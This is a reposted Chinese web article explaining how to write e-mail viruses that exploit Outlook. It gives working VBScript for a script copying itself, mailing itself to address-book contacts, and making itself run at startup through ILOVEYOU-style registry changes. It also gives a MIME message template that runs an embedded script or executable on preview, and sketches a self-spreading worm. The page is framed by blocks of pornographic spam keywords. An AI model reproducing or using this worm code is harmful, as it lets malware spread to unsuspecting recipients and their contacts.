国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

如何利用OutLook漏洞編寫病毒腳本
2007-09-24   coolweis

據(jù)稱目前已經(jīng)發(fā)現(xiàn)唯一不能通過OutLook傳播的病毒口蹄疫已經(jīng)被發(fā)現(xiàn),看來微軟也可以得以一陣子了。開個玩笑,OutLook在傳播病毒上真是臭名昭著,像iloveyou,梅莉莎等等產(chǎn)生過很大破壞力的病毒都是通過OutLook傳播的。其根本原因就是OutLook的人性化,與腳本的高度集成,復(fù)雜性等等,正是由于這些原因?qū)е铝瞬《镜膫鞑ァ?

下面我們看一下OutLook傳播病毒的機理:

首先看看病毒的幾大特征:自我復(fù)制性,傳播性,潛伏性。我們收先看看自我復(fù)制性。病毒要向傳播必須將自身復(fù)制借由其他郵件或本身發(fā)送出去,OutLook傳播的病毒基本上都是由VBScript編寫的,其自我復(fù)制的原理基本上是利用程序?qū)⒈旧淼哪_本內(nèi)容復(fù)制一份到一個臨時文件,然后再在傳播的環(huán)節(jié)將其作為附件發(fā)送出去。我們看看腳本是怎么樣完成這個功能的。

Set so=CreateObject("Scripting.FileSystemObject")
so.GetFile(WScript.ScriptFullName).Copy("C:dateiname.vbs")

就是這么兩行就可以將自身復(fù)制到c盤根目錄下dateiname.vbs這個文件。第一行是創(chuàng)建一個文件系統(tǒng)對象,第二行前面是打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數(shù)獲得這個文件,Copy函數(shù)將這個文件復(fù)制到c盤根目錄下dateiname.vbs這個文件。這就是大多數(shù)利用VBscript編寫的病毒的一個特點。從這里可以看出,禁止了FileSystemObject這個對象就可以很有效的控制這種病毒的傳播。下面的這條命令可以禁止文件系統(tǒng)對象。

regsvr32 scrrun.dll /u

我們再看看傳播性。病毒需要傳播,電子郵件病毒的傳播無疑是通過電子郵件傳播的。對于OutLook來說地址簿的功能相當(dāng)不錯,可是也給病毒的傳播打開了方便之門。幾乎所有通過OutLook傳播的電子郵件病毒都是向地址簿中存儲的電子郵件地址發(fā)送內(nèi)同相同的腳本附件完成的。看看如下的代碼:

Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 50
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="Betreff der E-Mail"
Mail.Body="Text der E-Mail"
Mail.Attachments.Add("C:dateiname.vbs")
Mail.Send
Next
ol.Quit

這一小段代碼的功能是向地址簿中的前50個用戶發(fā)送電子郵件,并將腳本自己作為附件。第一行是創(chuàng)建一個Outlook的對象。下面是一個循環(huán),在循環(huán)中不斷地向地址簿中的電子郵件地址發(fā)送內(nèi)容相同的信件。

至于潛伏,則多數(shù)是修改注冊表等信息以判斷各種條件及取消一些限制。比如下面從Iloveyou病毒中取出的部分代碼:

On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout",0,"REG_DWORD"
end if

很明顯是調(diào)整腳本語言的超是設(shè)置。下面的一段代碼則是修改注冊表,使得每次系統(tǒng)啟動自動執(zhí)行腳本:

regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32",dirsystem&"MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL",dirwin&"Win32DLL.vbs"

其中MSKernel32.vbs和Win32DLL.vbs是病毒腳本的一個副本。
ILoveYou病毒還做了一些其它的修改。

從上面可以看出其實寫一個通過OutLook傳播的電子郵件病毒很簡單。但是作為附件傳播,這種傳播的效率可能就會打些折扣。下面的一種方法是根據(jù)最新的IE的漏洞利用的。下面是這個漏洞的一些情況:

From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will create the file C:deleteme.txt<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

set objFileSystem =3D CreateObject("Scripting.FileSystemObject")
set objOutputFile =3D objFileSystem.CreateTextFile("C:deleteme.txt", 1)
objOutputFile.writeline("You can delete this file.")
objOutputFile.close
msgbox "I have created the file : c:deleteme.txt"


--1

上面的這個程序的例子是表明當(dāng)雙擊附件的時候OutLook是不會提示你安全信息的,它是直接執(zhí)行的。這僅僅是將整個上面這些作為附件發(fā)送的情況。其實這個文件直接發(fā)送給對方,對方只要將焦點移到這一主題上就會執(zhí)行這個腳本。因此這一漏洞將更加有效的傳播電子郵件病毒。產(chǎn)生上面這個漏洞的原因大概是采用HTML發(fā)送方式其背景音樂文件沒有作檢查,導(dǎo)致腳本,應(yīng)用程序等被執(zhí)行。采用不同的編碼就可以將腳本,命令行命令,可執(zhí)行文件等內(nèi)嵌在郵件中。注意上面的一行:

name="hello.vbs"

這個文件名可以任意命名,如果是腳本則需要vbs擴展名,如果是命令行命令則應(yīng)該是bat或cmd結(jié)尾。如果是腳本或這種文本方式的命令,則編碼方式應(yīng)為:quoted-printable

Content-Transfer-Encoding: quoted-printable

如果是應(yīng)用程序則文件名應(yīng)該改為exe擴展名:

name="hello.exe"

編碼方式應(yīng)該改為uuMime(base64)編碼:

Content-Transfer-Encoding: quoted-printable

然后將應(yīng)用程序進(jìn)行base64編碼插入到:

Content-ID: <THE-CID>

--1

之間。這樣就構(gòu)造好了一封信。發(fā)送的時候可以選擇quack寫的perl程序,也可以采用我寫的windows上的傻瓜程序。

根據(jù)上面的經(jīng)驗,可以寫一個應(yīng)用程序,這個應(yīng)用程序就是病毒,它首先對自身進(jìn)行base64編碼,然后再將這個編碼嵌入到上面這個郵件中,然后向地址簿中的電子郵件地址發(fā)送這個電子郵件。收到這個電子郵件的用戶當(dāng)焦點再這個主題上時這個應(yīng)用程序就會立刻被執(zhí)行而沒有任何提示,執(zhí)行的結(jié)果是和上面一樣,先將自身編碼,在插入到郵件,在向地址簿中的電子郵件地址發(fā)送。如此傳播。問題是應(yīng)用程序?qū)Φ刂凡镜淖x取沒有腳本那么容易,而且應(yīng)用程序的大小也要比腳本大很多。采用腳本編寫的話則在發(fā)送郵件中比較難于處理成一點即運行的方式。也許是本人對于腳本語言知之甚少的緣故吧。另外在處理復(fù)制中也有些困難。因為再另一端執(zhí)行時腳文件值包含這些腳本命令,而不包含上面的額外的東西。所以處理起來也比較困難。

以上是我的一點點看法,有些地方可能不對,還請各位大俠批評指正。

熱詞搜索:

上一篇:Web開發(fā)中遠(yuǎn)程腳本的應(yīng)用
下一篇:郵件頭文字

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产成人精品一区二区三区网站观看| av电影一区二区| 丁香桃色午夜亚洲一区二区三区| 精品免费一区二区三区| 久久疯狂做爰流白浆xx| 国产欧美精品一区| 色综合久久中文字幕| 亚洲影院理伦片| 日韩免费高清av| 丁香啪啪综合成人亚洲小说 | 色综合网站在线| 亚洲国产精品人人做人人爽| 欧美一二三四在线| 成人免费福利片| 久久成人免费网站| 一级精品视频在线观看宜春院| 欧美一区二区视频免费观看| 丁香婷婷综合激情五月色| 亚洲chinese男男1069| 国产日韩欧美综合在线| 欧美顶级少妇做爰| 97成人超碰视| 国产成人自拍网| 男男gaygay亚洲| 一区二区三区小说| 欧美激情中文字幕| 日韩亚洲欧美高清| 欧美色图12p| 91麻豆swag| 成人精品一区二区三区四区| 蜜臀久久久99精品久久久久久| 亚洲色图另类专区| 亚洲国产精品激情在线观看| 日韩欧美视频一区| 欧美麻豆精品久久久久久| 北条麻妃一区二区三区| 精彩视频一区二区三区| 日韩成人免费看| 亚洲成人动漫在线观看| 亚洲另类色综合网站| 中文子幕无线码一区tr| 久久久亚洲高清| 日韩精品一区二区三区三区免费| 欧美午夜电影一区| 在线这里只有精品| 色呦呦国产精品| av福利精品导航| 色综合天天狠狠| 91一区一区三区| 色偷偷成人一区二区三区91| 色欧美日韩亚洲| 色一情一乱一乱一91av| 91在线免费看| 日本韩国欧美三级| 91视频在线看| 欧美亚洲一区二区在线观看| 欧美在线色视频| 欧美三级日韩三级| 欧美一区二区久久| 精品日韩在线一区| 久久精品免视看| 国产精品久久精品日日| 中文字幕色av一区二区三区| 亚洲另类中文字| 天堂资源在线中文精品| 蜜臀av一区二区| 国产成人免费视频网站| 99久久国产免费看| 欧美亚洲国产一区在线观看网站| 欧美日韩一区二区三区视频| 日韩欧美www| 国产欧美一区二区精品仙草咪| 日韩毛片高清在线播放| 午夜激情综合网| 国产毛片一区二区| 欧美中文字幕一二三区视频| 日韩免费高清电影| 亚洲日穴在线视频| 久久国产精品色婷婷| 成人av集中营| 91精品国产综合久久小美女| 久久久亚洲精品一区二区三区| 亚洲欧洲精品天堂一级| 日日摸夜夜添夜夜添亚洲女人| 国产一区二区三区不卡在线观看| 91丨porny丨户外露出| 日韩欧美高清在线| 亚洲日本一区二区| 国产一区福利在线| 欧美日韩一区二区电影| 国产精品全国免费观看高清| 午夜久久电影网| 不卡一区二区在线| xnxx国产精品| 日本怡春院一区二区| 丁香婷婷综合色啪| 精品日韩在线观看| 婷婷中文字幕一区三区| 成年人国产精品| 欧美不卡一区二区| 亚洲高清免费一级二级三级| 国产91精品在线观看| 欧美日韩一区二区三区在线| 国产精品理论在线观看| 激情av综合网| 欧美一区二区女人| 亚洲国产精品一区二区久久| 成人国产一区二区三区精品| 日韩一级免费一区| 日韩国产欧美三级| 欧美图片一区二区三区| 亚洲视频在线一区| 成人黄色在线看| 日本一区二区电影| 国产米奇在线777精品观看| 欧美四级电影在线观看| 亚洲男人的天堂网| 99国产欧美另类久久久精品| 国产精品免费视频网站| 国产原创一区二区三区| 亚洲精品一区二区三区在线观看| 秋霞影院一区二区| 欧美一区二区在线免费播放| 日韩成人一级片| 欧美一级在线视频| 免费观看久久久4p| 欧美电影免费观看高清完整版| 青青草97国产精品免费观看无弹窗版| 欧美日韩免费一区二区三区| 一区二区成人在线| 欧美伦理电影网| 奇米在线7777在线精品| 欧美大片免费久久精品三p| 美女一区二区视频| 欧美白人最猛性xxxxx69交| 黑人精品欧美一区二区蜜桃| 日韩欧美国产小视频| 精彩视频一区二区| 欧美国产精品中文字幕| 成人激情视频网站| 综合久久给合久久狠狠狠97色| 99国产精品国产精品久久| 亚洲精品免费在线观看| 欧美日韩一区 二区 三区 久久精品| 亚洲另类在线一区| 51精品视频一区二区三区| 秋霞影院一区二区| 久久色中文字幕| 99riav久久精品riav| 日精品一区二区| 精品久久久久久久久久久久包黑料| 国产一区二区成人久久免费影院| 欧美国产日韩精品免费观看| 91在线国内视频| 日韩精品久久理论片| 久久精品在这里| 色偷偷久久一区二区三区| 蜜臀av国产精品久久久久| 国产午夜精品久久久久久免费视 | 在线不卡a资源高清| 蜜桃91丨九色丨蝌蚪91桃色| 国产亚洲va综合人人澡精品| 色综合久久综合网97色综合| 一级女性全黄久久生活片免费| 欧美岛国在线观看| av电影天堂一区二区在线| 日韩精品一区第一页| 国产欧美视频一区二区三区| 在线观看日韩高清av| 久久国产乱子精品免费女| 中文字幕永久在线不卡| 欧美一区二区视频观看视频| 成人av免费在线| 老司机免费视频一区二区| 国产精品久久久久久户外露出| 欧美中文字幕一区二区三区亚洲| 国产伦精品一区二区三区免费迷| 亚洲三级免费电影| 国产三级一区二区| 国产精品第四页| 色综合天天综合狠狠| 久久精品国产在热久久| 一区二区三区加勒比av| 日韩一区二区三区精品视频 | 欧美男生操女生| 丁香亚洲综合激情啪啪综合| 日本不卡的三区四区五区| 欧美国产成人在线| 日韩午夜激情免费电影| 欧美性一区二区| 91在线视频播放| 99久久综合精品| 国产一区二区三区久久久| 三级久久三级久久久| 亚洲乱码一区二区三区在线观看| 欧美激情一区二区三区不卡| 欧美精品v国产精品v日韩精品| 99久久国产综合色|国产精品| 国产成人精品亚洲日本在线桃色| 视频一区二区中文字幕|